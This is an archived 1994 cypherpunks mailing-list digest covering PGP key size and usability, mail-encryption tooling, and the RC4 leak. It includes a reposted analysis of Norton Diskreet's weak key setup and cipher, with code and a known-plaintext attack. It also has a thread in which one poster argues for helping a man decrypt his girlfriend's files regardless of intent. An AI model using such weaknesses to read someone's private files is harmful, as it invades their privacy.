Fri, 23 Dec 94 12:38:05 PST Subject: Why I have a 512 bit PGP key Message-ID: <9412232039.AA03986@merckx.info.att.com> [Speaking of dumb things: when I added my PGP key to the bottom of this file a few minutes ago, I attached it to the pre-proofread version and sent that instead of this one. Sigh. Here's the correct version.] A while back, I generated a PGP key pair for use on my machine at work, a Sun SparcStation sitting on the reasonably-well-protected- from-outside-attack AT&T internal research network. I selected a key length of 512 bits. My number theory friends tell me that this is weak by modern standards; cracking my key would probably require within an order of magnitude of the total computational effort expended in the recent attack on RSA-129. I even volunteered my key as a ``target'' for the next such attack. Still, I'm happy with my choice, or rather, I've got so many other security things to worry about that compromise of my private mail based on cryptanalysis of my dinky little public key to obtain my private key is the last thing on my mind. In fact, I kind of like it that my key doesn't advertise pretensions of high theoretical security when, in fact, there is very little at all in practice. The first problem, of course, is secret storage. Modern networked computers are awful at storing secrets. (This, after all, is one of the problems that crypto software like PGP aims to solve). I suspect my situation is reasonably typical, if not better than most. My computer at work sits on my desk (in my locked office), has its own local disk, only I know the root password, I try to keep up with the latest security patches, and I keep most of my files in encrypted form under CFS. I'm the only regular user of my workstation, and while I'm at work I access it directly from the console. The network to which it is attached is AT&T's ``R&D Internet'', the same one that sits behind the firewall described in Cheswick and Bellovin's great new book. I probably have at least average system administration and general computer security skills, and I'm reasonably good about practicing what I preach. Sounds like a pretty secure machine from which to run PGP, right? I don't think so. While my machine's operating system is pretty self-sufficient, my own home directory sits on a remote file server administered by people who are good at and have time to perform essential services for me like taking backups. This means that, no matter how hard I try, it's impossible for me to be sure that none of my files have been tampered with. We use off-the-shelf NFS, which means that for all practical purposes anyone with access inside the firewall (that's about 50k people in my case) can replace any of my files. Furthermore, even though my office has a lock, I'm not the only person in the world with the key (Bell Labs escrows office keys, after all), and I've managed to pick the lock once or twice on days when I left my key at home. I really have no idea where my machine has been or what software I'm typing at when I run PGP. So where should I store my private key? Well, I could, as some have suggested, keep it on a floppy disk that I carry around with me everywhere I go, but first of all, that's too inconvenient. It also sounds dangerous in practice. A floppy disk is about the size of a US passport, and I've already lost two of those. That means I'd have to replicate the key somehow anyway, so I might as well rely on the reasonably well established backup procedure that protects me from loss of the rest of the files in my home directory. For all practical purposes, I have to assume that my secret key file is public. That leaves the passphrase to protect the secret key. According to Shannon, English text contains just over 1 bit per letter of real information. Even if we assume twice that to account for the added twists and turns of phrase I'm inclined to add to a passphrase, I just can't remember (or type) a phrase with anywhere near enough entropy to approach the level needed to do justice to even a little 512 bit RSA key. I think the simplest cryptanalytic attack against me would be to go after the passphrase-based encryption of the secret key file. (You'd need a way to enumerate the most likely keys based on a hashed passphrase, which is a problem not yet well studied in the unclassified literature. I suspect a solution is not out of reach of a determined adversary, however). An even simpler attack would be to break in to my machine and replace my copy of PGP (or my kernel, or my shell, or whatever) with one that records the passphrase as I type it. (No, I don't leave this as an exercise to the reader!) The next problem is with PGP itself. While I haven't looked carefully, it seems to be a well-engineered program, and it has a number of design features that I admire. However, I think the basic model it implements sits at too high a level, making it inherently unreliable for really sensitive traffic. It's just too hard to use. (Most of the problems could be fixed by pushing things to a lower level, and I understand a number of people are working on this). In particular, I'm forced to have too much involvement in each PGP operation, and it's just too easy for me to do stupid things like: - encrypting messages with the wrong public key - sending the cleartext file instead of the ciphertext file - leaving the cleartext file around in an unprotected file system - including the passphrase in the message (especially when your fingers are so used to typing it all the time...) - forgetting to use PGP at all - typing a passphrase over a network connection (especially easy when you've got several windows open on several machines). Systems that use hardware keys (smartcards, etc) are less vulnerable to this I've done each of these dumb things at least once, and probably others as well. Don't get me wrong - I advocate the use of strong encryption as much as the next nerd. I'm just concerned about focusing so narrowly that we lose sight of the larger security picture. Perry Metzger once made reference to cryptographic "size queens" who worry about key size and nothing else - it's a phrase that rings true. There's something to be said for systems that offer security parameters that provide about the same strength across various attacks. DES is a good example - a 128 bit key DES could be designed that is at least as secure as the current 56 bit version - by at least few bits. The engineering triumph is that the "advertised" DES security parameter - the key size - tells close to the truth about the overall security of the system. (Of course, in RSA-based systems, there's an added variable - advances in factoring - that may make it prudent to include a significant margin for error, especially for keys that must retain their strength over time). I have a 1024 bit key at home. -matt -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.1 mQBNAitm4zgAAAECANYaL7K5Ca5B4Sq3udKKkFasQNrgfKGoWRUjwB/10lAFVrhN aKz/b6iJXFxZ6g+YlCvdQTu/EUO6JkBihshIRgEABRG0D21hYkBiaWcuYXR0LmNv bbQhbWF0dCBibGF6ZSA8bWFiQHJlc2VhcmNoLmF0dC5jb20+iQCVAgUQLIG7Ga1S SlGFGX+1AQEt7QQAtwhDbN/799e763LrbhB5ItoR1r2ud+nWBZi0S64OVnVkLjnd zVwMouPiaiEs/ORWQfoVPmME6fMYlUeh+uLonSDymjzosWyU6yJRs8lcAy2MMBR+ De00mHk8+nDAuY0j4udH2oqvd6V6IEgsN8bQeme8CkNj3uULmzNMrYtns7aJAJUC BRAr3LtEs25wSZyVhQ8BAXQwA/wIxBaxEM/DER96N6o00qzzJog8nbKGH2S4achc P0/96N9FXgnnoKybARfG+ZfliuuMRyt40MIkg1/Z5PzLg0m5dVzXgkYv7B98bI+8 dVuzENJRzBbbmSDemcTaF2KWdtW7U66xFSP6S86RDOuQHzg6uCi2tmoJhvdWroWz VVxGj4kAlQIFECtzeqp9h9s63RlgUQEB8UoD/ilKx2sUFzQwkM3DSRQZun5FoR1N ujmt710NHkn3BFcRcBAU1o6VEHg0MlQXYEDk16YnhUEZDy0QuMrxXWcLee1UP2jl k0+ezNP5NMsSMt7HVjGJ+xi+exc6+Clyl/WjSEhpears1kBWAI12eVbO1uI/uGr5 vksZqkPoT8a1WaumiQCNAgUQK21uiULwpfyXKdSbAQFErAO/TsSmabCpT4Uzi/zQ 14yBiDqwatj8mhaE60nG8wiqQv4W4hmDXjrxGRr0LQNM3eBLCkoEpKIDmL1RuwtB Z4AUsqoJTC2Yq46KnSznfqgY0F+C4kSptxo0p1KJ79FKFlW9dyTKVBB1WOBzbsw1 Kx/oog+DmUH0VIbYiQCVAgUQK21W3FTdX6I8ZiRnAQHErAP+P+WalKGRrgM/v8pp o4YKYmXxjsLUx89WJXMkxkoSzB7/ny7ITHo9i42qR+aXlsa+gqxdwRDrpI6k9FFF AhZ8s/bdZKpnXOJOjaj4P5LRbYem2VOZ8e9omXhHfz7a7NRUTimLA/q6lphy3Ulp byrua5Q8BkzQzI3RgbKEPshuOjeJAJUCBRArZuU6hr7UV33/hTMBATvGA/42wy/x BEVb5bOQiFTpEuB80Df53zt+b4TmfeueMMiDvvj7A5joLk7X/7x6HaBxHN/thbd6 S9NncWJfvy/PMnsQEmKarn45kwn/2xxDu2Po7pUN6Uj9DyA9uY+ilzqfk7ZA3RwH cbZA0Qv6LDNbapJXgFANwOC1tRB6yLtSG3T0iw== =V30c -----END PGP PUBLIC KEY BLOCK----- From lbilling at interserv.com Fri Dec 23 14:44:02 1994 From: lbilling at interserv.com (Al Billings) Date: Fri, 23 Dec 94 14:44:02 PST Subject: GUI: PGP vs novices Message-ID: <199412232241.AA20845@relay.interserv.com> >The product works at the Windows Sockets layer, intercepting mail as it is >sent from the mail application to the SMTP host, and performing the above >crypto related functions based on text placed at the top of the mail message. [ Some Deleted ] >A major complication that I've come up against is installation. Somehow >I've got to provide a painless way of discovering the Winsock stack in use >on a machine, and installing my WINSOCK.DLL so that it gets loaded instead >of the real one (which my software then loads on its own and intercepts >calls to.) >This is really easy to do manually when one has knowledge of such things; it >is a major pain in the ass to come up with a way of doing this that doesn't >require the user to know anything about Windows Sockets or DLL's or path >variables, etc. There is also the problem that a number of applications (such as Internet in a Box) require there own Winsock to make connections to the Internet. If you replace the Ibox winsock with another, when you run the programs they will no longer call the dialer to dial into the Internet. I believe the same holds true for Trumpet. Wassail, Al Billings From jcorgan at scruznet.com Fri Dec 23 15:03:12 1994 From: jcorgan at scruznet.com (Johnathan Corgan) Date: Fri, 23 Dec 94 15:03:12 PST Subject: GUI: PGP vs novices Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >There is also the problem that a number of applications (such as Internet in >a Box) require there own Winsock to make connections to the Internet. If you >replace the Ibox winsock with another, when you run the programs they will >no longer call the dialer to dial into the Internet. I believe the same >holds true for Trumpet. I only have familiarity with the commercial Netmanage Chameleon Winsock implementation. Someone else had let me know about this potential difficulty. Apparently some Winsock stacks only provide a WINSOCK.DLL for 3rd party compatibility, i.e., their own applications talk to proprietary hooks into their stack for performance or other reasons. Netmanage's products do both; they perform their network I/O through WINSOCK.DLL, but also use a variety of shared library functions supplied with the rest of the stack. In this case, my WINSOCK.DLL shim works fine. Remember, I'm not replacing a given implementation's DLL, just intercepting and passing through calls to it. So as long as a mail application uses exclusively standards based Windows Sockets API calls _to perform network I/O_, my product should work. YMMV, of course :) ======================================================================= Johnathan Corgan "Violence is the last refuge of the incompetent" jcorgan at netcom.com -Isaac Asimov PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan ======================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLvtW4k1Diok8GKihAQEjngP7BRUatySeVmJ2SvDLycMYtCTh5obyvAZ4 nLxhP69VUCs1LprfMVWIsL46WsS/neiVpf3Wor0T/kzLrb0s/0m3a8+GQhdz7te9 NRQbJGfJG57KR1yCBHMk2/HSDjVR0daCQVQCcJFTqw2aOXfWo6x20ZZqQvR1N2Ju U57UIG9BRG4= =Xm6z -----END PGP SIGNATURE----- From greg at ideath.goldenbear.com Fri Dec 23 15:10:26 1994 From: greg at ideath.goldenbear.com (Greg Broiles) Date: Fri, 23 Dec 94 15:10:26 PST Subject: Norton encryption and privacy Message-ID: <199412232307.AA05754@ideath.goldenbear.com> -----BEGIN PGP SIGNED MESSAGE----- This was posted to USENET several months ago. Diskreet is a PC-based device driver which creates a virtual encrypted partition on a normal hard disk partition. I don't know if they use the same algorithms in Norton Encrypt or not. Snooping in other people's files still sucks. ----- From: pgut1 at cs.aukuni.ac.nz (Peter Gutmann) Newsgroups: sci.crypt,comp.security.misc Subject: Norton's [In]Diskreet: An update Followup-To: sci.crypt Date: 13 Jul 1994 17:21:57 GMT Organization: University of Auckland Lines: 96 Sender: pgut1 at cs.aukuni.ac.nz (Peter Gutmann) Message-ID: <3017rl$8j4 at ccu2.auckland.ac.nz> NNTP-Posting-Host: cs13.cs.aukuni.ac.nz X-Newsreader: NN version 6.5.0 #7 (NOV) Last November I picked apart part of the Diskreet encryption program and posted what I found to this group. By some miracle I had a bit of spare time this afternoon, so I've had another quick look at it. The result is some more information on the proprietary encryption algorithm and the file format it uses. First, a recap of what I presented last time: The key setup process is very badly done. The front-end gets a password in the range of 6..40 characters, and converts it to all-uppercase. Then it packs it into a struct along with a collection of other information and passes it to the DES library used by Diskreet. The first thing this does is take the password and reduce it to 64 bits by cyclically xor-ing the full-length password into an 8-byte buffer initially set to all zeroes, ie: for( index = 0; password[ index ]; index++ ) buffer[ index % 8 ] = password[ index ]; It then performs what looks like a standard DES key schedule with the 64-bit output from this operation. This creates 128 bytes of subkeys for encryption and 128 bytes of subkeys for decryption. These are either used for the proprietary encryption method or for DES encryption. Here's a rundown of the proprietary method: All operations are performed on 16-bit words. byteSwap() performs an endianness-reversal on a word. Chaining is performed by xor-ing in the previous ciphertext word. The keyTable is the 256-byte array of DES subkeys, treated as an array of words. data[ -1 ] = 0x1234; index = sectorNo % 128; index = keyTable[ index ] % 128; for( i = 0; i < SECTOR_SIZE / 2; i++ ) { value = keyTable[ index++ ] + data[ i ]; byteSwap( value ); value ^= data[ i - 1 ]; data[ i ] = value; index %= 128; } As can be seen, a known-plaintext attack will recover the (expanded) encryption key without too much trouble - it's just a repeated addition of a 128-word array to the data, with the previous word xor'd in for chaining purposes. The xor and byteSwap are basically nop's and can be stripped off without any problems, revealing the key stream used to encrypt the data. Since encryption is done by sectors, the same key data is used twice for each sectors. How do we perform a known-plaintext attack? It's quite simple actually, since Diskreet itself provides us with about as much known plaintext as we need. The file format is: General header BYTE[ 16 ] "ABCDEFGHENRIXYZ\0" char[ 13 ] fileName LONG fileDate BYTE fileAttributes LONG fileSize LONG file data start BYTE[ 16 ] 0 File data BYTE[ 32 ] 0 Padding to make it a multiple of 512 bytes Everything from the 16-byte magic value to the end of the file is encrypted in blocks of 512 bytes. The proprietary scheme will directly reveal its key stream on the 16-byte check value, the 16 bytes of zeroes at the start, and the 32 bytes (minimum) of zeroes at the end of the data. Interestingly enough, the presence of the 16-byte known plaintext right at the start would tend to confirm the rumours that that's one of the criteria for having an encryption program approved by the NSA. The plaintext also gives us the name of one of the programmers involved. In my previous posting I said: The encryption itself uses DES in CBC mode with a fixed IV. This means that, in combination with the tiny key space, it's possible to create a precomputed collection of plaintext/ciphertext pairs and "break" most encrypted files by reading the results out of a table. The 16-byte known plaintext makes this attack a certainty. In addition, if two pieces of data are encrypted with the same key, one with the proprietary method and one with DES, the DES key can be recovered from the proprietary-encrypted data and used to decrypt the DES-encrypted data. Again quoting from my previous posting: In summary, there may be a correct DES implementation in there somewhere, but it doesn't help much. [In]Diskreet will stop a casual browser, but won't give you any protection at all against any serious attack. Peter. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLvtYIH3YhjZY3fMNAQHeYAQAmNUJA9TfNQAJ+5jwbGDFbFtgjFVg1Gyn /RgAou3GuQvVRpmTqurVUWN8wzUCluj6ouU39ct2DEoyMHLFgkCdTcxDcSIS8Tpz yb9yPkI2Sr2uJ8dE5kuN29v0D3Nq4vW3a8jhRi2oJC3WbAaWYuoCQees8/wxfOfy 4bDPouwTBYc= =Rx5b -----END PGP SIGNATURE----- From ddt at lsd.com Fri Dec 23 15:21:31 1994 From: ddt at lsd.com (Dave Del Torto) Date: Fri, 23 Dec 94 15:21:31 PST Subject: B-PGP: news/requests Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Note: I'm meta-prefixing this "B-PGP" to indicate the "Beginner-PGP" thread. At 10:37 am 12/21/94, bshantz at spry.com wrote: >It is my own personal opinion that in order for crypto to truly become >mainframe, the software manufacturers of internet connectivity packages must >integrate crypto into the applications. [elided] FYI, any of you who haven't heard should be pleased to know that Steve Dorner is working with Zig Fiedorowicz on integrating ViaCrypt PGP/Mac functions into Eudora (on the Mac, at least, which is a good starting point). This is a major step forward, since Eudora is so POPular :) and this could certainly increase sales of ViaCrypt's s/w as well. In the meantime, I'm looking at the AppleEvent scripts that have been made public and will make comments on them soon. Anyone who's up-to-date on current Mac or Windows version development (Hal Hildebrandt?) is encouraged to contact me, per Phil's request. I just want to make sure everyone gets what they need and that the left hand knows what the right hand is doing, etc. I'll set up an FTP directory "somewhere" for a central repository if anyone feels it's necessary (location to be announced elsewhere). BTW, I'm starting work on a Beginner's PGP-FAQ and would appreciate any question/answer pairs anyone would care to submit. Please keep them simple: they are aimed at an AOL-ish user level. The final document should be extremely non-technical, non-threatening and about three pages long maximum. In it, I will describe the History of the Entire Cryptographic World in 4000 words or less. :) I'm calling the 3-Minute Shakespeare Troupe next week for pointers on how to accomplish this... Speaking of AOL, does anyone know anyone on the current Internet development team there? I used to exchange email with some internet-oriented guys there back in '90-'91 but I wonder if anyone is in current contact - I'd like to discuss the possible integration of PGP into the AOL client software. That would effectively put PGP in a couple of million users hands PDQ. With all the bidness activity there of late, it seems to me there's a need that could be filled quite nicely. >In order to bring crypto to the masses, we have got to convince people that >it is necessary. We also must make it"second nature". It sure is nice to have >a menu option or a toolbar button that will encrypt plaintext automatically. >Key management and some of the "high tech" (I know, for us it's nothing, but >for my dad who just bought a computer and doesn't understand the difference >between click, double click, and drag, crypto is a really high tech thing >just in itself.) Notice Brad didn't even mention his MOM yet. I once tried to explain PGP to my Mom. "That's very nice, dear," was about the breadth of her reaction, but I still put a box on her desk and set her up with a key, even if she won't use it yet (ever? hey, she's a mom, Okay?). Now, if it was a real point-n-click maneuver, it might have a snowballs' chance in hell with her, but until then... >things of crypto should not be directly handled by the user. >(Optional >of course. On a privacy level, the user should have full control. Indeed. I'm hoping the upcoming versions of mainstream PGP (Mac/Win) will allow for a bit more modularity in the apps. I.e. it would be nice if you could "plug in" various functions, so that you could build up the app's features as a user gained more sophistication, but this may be way beyond the v3.0 scope. More on this idea later, as it more directly relates to system software extensions than PGP application stuff. >But give the user a break...if the software is secure..as such...so is the >user's privacy.) > >You will notice that this message is not signed. That's because in order to >sign it, I would need to save my message, hop out to a DOS box, PGP encrypt >it, hop back to my mail program and insert the encrypted mail as a text file. >That's enough to discourage the average user. This is pretty much what Tim >May was talking about when he discussed why he doesn't sign his messages. >It's not that he couldn't... it's just not practical for him. It's not >>really practical for me either, but I do it when I feel it's necessary. > >The only way to make crypto practical is to basicalloy hide the technical >side from the user and make it easy. Let me describe briefly for you all (and everyone is encouraged to type up a similarly brief log of what they do on their machines so we have a UI comparison table) what I deal with when I encrypt a msg on the Mac. Keep in mind that I have worked very hard to streamline the process as much as possible, and that this is before installing the AppleEvent scripts. It's not difficult for me, but for someone without a clue... well, they get two steps in, stare at the screen and eventually bag it. type msg body (in Eudora). select text copy to Mac clipboard (system) switch to PGP with macro Encrypt (or Sign) menu command [PGP reads the clipboard here, a wonderful improvement thanks to ...Zig?] enter passphrase [PGP outputs encrypted text to clipboard, wipes temp file] macro back to Eudora. paste clipboard back into msg body Now, all of this is easily scriptable: I once did it with a long complicated macro, but it was s l o w, so I bagged that idea - it didn't even use system level events. I'm hoping the new AE scripts will handle most of this, but it SHOULD all be done in the application layer by Eudora with direct calls to PGP in the bg (see above annc re Steve Dorner), which is the current direction. Let's hope ViaCrypt's new AE support will allow for this (Zig? hello?). IMPORTANT: Anyone currently working on an PGP versions is hereby requested to mail me regarding the coordination of development efforts. Mail Phil with questions about this. ALSO: There will/should be a group discussion at the upcoming physical meeting on the 14th which both Phil and I will be attending. Please bring your keys/laptops/floppies for signing. Over and out, dave ________________________________________________________________________ Speaking of "term limits," hasn't Rush Limbaugh gotten enough attention? -----BEGIN PGP SIGNATURE----- Version: 2.6ui iQCVAgUBLvtabKHBOF9KrwDlAQFYkAQAiKcjZx5iCzn0CLIBY5/TzVOY8sl7Jclo v6MSPdNdU3ONTBLtDlI3HbSnq/SqGyJxkgxex7aLaICwB+RUsE2TMnJ2PBXD1W0T 48eqQZT3IhT35gEfV3RQnYllIS4mhEWxzq8KFMPwdCjlNrF794TqZFgBadWZL+LR 4hXhnrTuB5A= =/bL0 -----END PGP SIGNATURE----- From jcorgan at scruznet.com Fri Dec 23 18:54:30 1994 From: jcorgan at scruznet.com (Johnathan Corgan) Date: Fri, 23 Dec 94 18:54:30 PST Subject: CERN HTTPD proxy info Message-ID: Could someone please post the address/port for the HTTP proxy at CERN? Thanks, Johnathan From unicorn at access.digex.net Fri Dec 23 20:28:59 1994 From: unicorn at access.digex.net (Black Unicorn) Date: Fri, 23 Dec 94 20:28:59 PST Subject: Breaking into girlfriend's files In-Reply-To: <9412231452.ZM19768@wiley.sydney.sgi.com> Message-ID: On Fri, 23 Dec 1994, Ian Farquhar wrote: > Date: Fri, 23 Dec 1994 14:52:06 -0500 > From: Ian Farquhar > To: cypherpunks at toad.com > Subject: Re: Breaking into girlfriend's files > > On Dec 22, 9:46pm, Mark Terka wrote: > > GROAN! What the hell is this list about anyway?????? I think we are losing > > perspective about encryption, privacy etc etc... > > > Putting it quite simply, the individual was asking about how to make an > attack > > on an opponent. Whether that opponent is a girlfriend, spouse, competitor or > > terrorist group, who cares? Lets save the sermonizing for Ann Landers...what > > state the relationship is irrelevant. > > What a load of amoral rubbish. By who's standard? Yours? > > Cypherpunks is a group whose members believe in the application of > technology to PROTECT privacy, not to violate someone else's. > Once you assume that capability implies right, you're on very > shakey moral ground, but that is exactly what you are saying in this > post. I find that position repellent, and I would be very surprised > and not a little disappointed if you find many others here who felt > the same way. Who the hell are you to define the position of cypherpunks? Who the hell are any of us to do this? I guess I suffered from the silly idea that as a whole, the members of the list would not put short term morality before the long term goal. It seems there are those who disagree with me. I would offer the following: While it may be that Joe Break-Into-Girlfriend's-Files may or may not be justified, that is not ours to judge. It is simply for the crypto non-challenged to comment on the security or lack thereof of a given system. As soon as this list turns into a pile of bleeding heart liberals, anxious to embroil themselves in the personal matters of others, it has failed. I cannot believe that people on this list, those who claim to be interested in the preservation of privacy, would support the proposition that knowledge about the strength or weakness of a given system should be surpressed. What the hell is that? I guess no one who supports this position has ANY business >WHATSOEVER< in pointing out that digital cellular has a low level of security than it is advertized as, or that Clipper is compromised. Who the hell are you people to second guess? Back to security through obscurity I suppose. How typical. What a perversion. Freedom of information, except where that information may violate principals we define, and enforce. Strong crypto for all, except those who would use weak systems, those we will keep in ignorance, and refuse to educate in any manner. Denouncement of insecure crypto security, unless of course, it might tend to offend someone, the definition of offense we shall, of course, define. What a load of sanctamonous crap. We will decide what's good for you, and what you are allowed to know. Disgusting. Get off this list, you belong on alt.codependency.recovery, or alt.bleeding.liberal. > > I bet the poster would have gotten a more sympathetic response if he said he > > had gotton his hands on a diplomatic cable.... I submit that the response should have been the same regardless of the nature of the material. Which is it going to be? 1> Q: "How do you attack X?" A: "Y" or 2> Q: "How do you attack X?" A: "Realistically X should not be attacked, because to allow the widespead lack of confidence in X will destroy society as we know it, and anyhow it's nasty." > Possibly. IMO, what the original requester was asking for was so > repulsive and immature that the responses so far have been mild. Who are you to judge? Take it to alt.partronizing.jerk > > Ian. > > -uni- (Dark) 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From unicorn at access.digex.net Fri Dec 23 20:40:04 1994 From: unicorn at access.digex.net (Black Unicorn) Date: Fri, 23 Dec 94 20:40:04 PST Subject: Breaking into girlfriend's files In-Reply-To: Message-ID: On Fri, 23 Dec 1994, Dave Horsfall wrote: > Date: Fri, 23 Dec 1994 15:41:49 +1100 (EST) > From: Dave Horsfall > To: cypherpunks at toad.com > Subject: Re: Breaking into girlfriend's files > > On Thu, 22 Dec 1994, Mark Terka wrote: > > > GROAN! What the hell is this list about anyway?????? I think we are losing > > perspective about encryption, privacy etc etc... > ^^^^^^^ > You said it. [Watch now how the author perverts the notion of privacy...] > > > Putting it quite simply, the individual was asking about how to make an attack > > on an opponent. Whether that opponent is a girlfriend, spouse, competitor or > > terrorist group, who cares? Lets save the sermonizing for Ann Landers...what > > state the relationship is irrelevant. > > And *HE* gave the reason - he wanted go rifling through his girlfriend's > private files. And here I was, thinking that this list was about "better > privacy through cryptography" - I must have subscribed to alt.2600 by > mistake... Come to think of it, that's a better place for the original > query... And what has the author done here, but involve himself in the affairs of our poster requesting information on Norton...? Some privacy he afforded the would be norton breaker, or even norton breaker's girlfriend. Sure, Norton breaker should have kept his mouth shut, but a small comment at the end of a technical post detailing norton should have taken care of this. Mind your own business next time smart guy. > > The gentleman asked a question regarding a standard cryptographic problem... > > how you can intercept and interpret encrypted information, either in theory > > in practice. To make judgement calls is WAY out of line and a hell of a bad > > precedent for this group. > > Read it again - he specifically wanted to sneak into his partner's files; > that is a clear invasion of privacy. How much context do you have here? I submit again, you should just mind your own business. I hardly accept your judgement as to when information should or should not be released. Jeeze - I thought a Yank would have > understood this... > Not all of us are "Yanks" my friend. > > I bet the poster would have gotten a more sympathetic response if he said he > > had gotton his hands on a diplomatic cable.... > > And would you have been just as sympathetic if somebody wanted to rifle > YOUR files? Had I encrypted with Norton encrypt? I would have been deserving of whatever attack ensued. When the hell are people going to take responsibility for themselves. Who are you to assume anothers responsibility for their privacy? What will happen when your paternalistic regime is on vacation? Let's make a government crypto subsidy eh? Obviously people are such idiots that they all need government to supply them with crypto. I guess you'd be the head of standards? Deciding when and who gets which methods? > > Oh boy! Pretty soon we will have this list as "cypherpunks giving advice to > > the lovelorn..."!!! Lets cut the crap, stick to the problem at hand and > > offer solutions to what the participants of the list know best, namely the > > the use and analysis of cryptographic problems. > > That has nothing to do with it - person A wanted advice on how to invade > person B's privacy (he presumably doesn't have the guts to just ask her). > Sorry, but privacy works both ways - she's entitled to it just as much > as anybody else. I see, and if I asked how to eavesdrop on digital cellular, your position would be that I should not know. Obviously I intend, or could distribute such information to thousands who might violate the privacy of millions. Funny how the general disclosure doesn't bother you, but the specific disclosure, one which affects no more than perhaps three people, does. I suggest you get your perspectives in order. > -- > Dave Horsfall (VK2KFU) | dave at esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6 > Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE 9C 8C 54 5B 9A D4 A0 CD > -uni- (Dark) 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From unicorn at access.digex.net Fri Dec 23 20:45:11 1994 From: unicorn at access.digex.net (Black Unicorn) Date: Fri, 23 Dec 94 20:45:11 PST Subject: Breaking into girlfriend's files In-Reply-To: <199412230455.XAA07179@bb.hks.net> Message-ID: On Thu, 22 Dec 1994, L. McCarthy wrote: > Date: Thu, 22 Dec 1994 23:55:01 -0500 > From: L. McCarthy > To: cypherpunks at toad.com > Subject: Re: Breaking into girlfriend's files > > -----BEGIN PGP SIGNED MESSAGE----- > > Black Unicorn writes: > > If she gets burned using norton encrypt, perhaps she'll take the time to > > learn about real encryption. (I assume Norton's is trash) > > Short term privacy loss perhaps, but long term gain. > > This sounds to me rather like saying: > "If the American public gets burned by accepting Skipjack as the crypto > standard, perhaps they'll take the time to learn about real encryption." No, but close. If the American people accept Skipjack crypto, they deserve every bit of invasion they get for their laziness. Educate yourself or perish. The day of government provided intelligence should be long past. What a crock of shit. > > I prefer the version where the American public doesn't get burned in the first > place. If Clipper has to be adopted before the public will learn about real > encryption, why are we bothering to try to promote it now ? Shouldn't we be > backing Clipper wholeheartedly, to teach 'em a lesson ? > America, the country that is so rich, we can afford to subsidize the lazy and punish the prosperous. (Apologies to the sig I stole that from...) > [...] > > The more I think about the above, the more I wonder if those on the list > > have conflicting goals, that is, absolute privacy by agreement. Are we > > really that naive? > > I have ideals, yes. My deepest condolences if you don't have any. > I'm quite pleased I don't have even a trace of your ideals, thank you. Though I suppose it's typical you should think your's superior to any out there. Sanctamonous liberal who would spend my money to educate the lazy, what else would I expect. > - -L. Futplex McCarthy > > > - --- > [This message has been signed by an auto-signing service. A valid signature [...] -uni- (Dark) 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From nobody at jpunix.com Fri Dec 23 22:22:13 1994 From: nobody at jpunix.com (Anonymous) Date: Fri, 23 Dec 94 22:22:13 PST Subject: DDJ article on RC4 Message-ID: <199412240621.AAA24808@jpunix.com> Putting the Genie Back in the Bottle What had all the earmarkings of a major-league food fight sure didn't take long to dry up and blow away. Triggering the flap was an internet posting of source code that implemented the RC4 algorithm, an act that knocked on all kinds of legal doors - trade secrets, Internet-host liabilities, reverse engineering, shrink-wrap licensing, export control. You name it. The problem is that RC4, the block-cipher encryption algorithm at the heart of RSA Data Security cryptography, is protected as a trade secret. But some on the net say the online posting let the genie out of the bottle - RC4 was made public and available for anyone to use, RSA's claims notwithstanding. RSA counters that the company used trade-secret law simply to protect its intellectual property, and there's never really been any "secret" about the algorithm. Anyone willing to sign a nondisclosure agreement acknowledging RC4's trade-secret status could have ready access to the reference and source code. Among companies which have licensed RC4-based tools from RSA are Microsoft, Novell, Apple, and Lotus, all of which distribute RC4-based binary files in shrink-wrapped applications. You can imagine the furor when an unidentified person (or persons) used an anonymous remailer to post worldwide - first to a cryptographer mailing list, then to a newsgroup - source code that was supposedly RC4. Subsequent testing by programmers and cryptographers confirmed that the code was indeed compatible with "real" RSA RC4 code. RSA Data Security responded by calling in everyone from the U.S. Customs Service to the Federal Bureau of Investigation. In a strongly worded warning on the net, RSA said it considered the posting "a violation of law ... [and] ... a gross abuse of the Internet." If the person(s) who posted the source code had in fact signed an RSA nondisclosure agreement, the issue seems pretty clear-cut. They broke the law, not to mention RSA's trust. If, as some claim and RSA disputes, the code was reverse-engineered from object files in off-the-shelf software, then the law was probably broken - unless RSA and other vendors decide to test the strength of highly questionable and likely unenforceable shrink-wrap licenses that try to prohibit disassembly/decompilation. Of course, it just might be that some cryptographer derived the algorithm after examining the key, plaintext, and ciphertext. And there's even the chance, albeit unlikely, that a dumpster diver ran across discarded copies in RSA's corporate wastebasket. Questions concerning the legal status of copyrighted material that's made freely available (illicitly or otherwise) on the Internet also have to be tackled. Can Internet hosts be held accountable for an anonymous postings of protected material? And don't forget, RC4 isn't just any software - it's ENCRYPTION software. Is posting such software online worldwide the same as exporting it? If so, the State Department might have a thing or two to say. The end result is that RC4 code is available on ftp sites worldwide, ready and waiting for you to use it. But if you grab it off the net, can you use it without RSA's permission? For the time being, the answer probably depends on which lawyer you ask. Speculation aside, the RC4 controversy explains why many developers are protecting their intellectual property with patents instead of copyrights. Gray areas like RC4 would be black and white if RC4 had been patented. But then patenting would also mean that RC4 would have been public in the first place. The immediate impact may be on RC5, the next-generation version of RC4, which Ron Rivest describes in this issue. In part because of the RC4 controversy, Ron and RSA Data Security are considering patenting RC5, a departure from their original plans. At one point, RC5 code and reference was to be distributed free-of-charge for noncommercial use. Small businesses could license the material for $500, and large businesses, for $1000. All proceeds were to go to RSA Labs - not RSA's bottom line - to fund further R&D. This could still happen even if RSA patents RC5, but the licensing fees would be higher to offset the patent costs. Likewise, there could be some repercussion in terms of exporting RC4-based systems. For the past couple of years, vendors have been allowed to export software that uses RC4 short-key encryption. The State Department could change this since RC4 is no longer secret. As for the multitude of legal questions, nothing concrete will immediately come of the RC4 brouhaha, 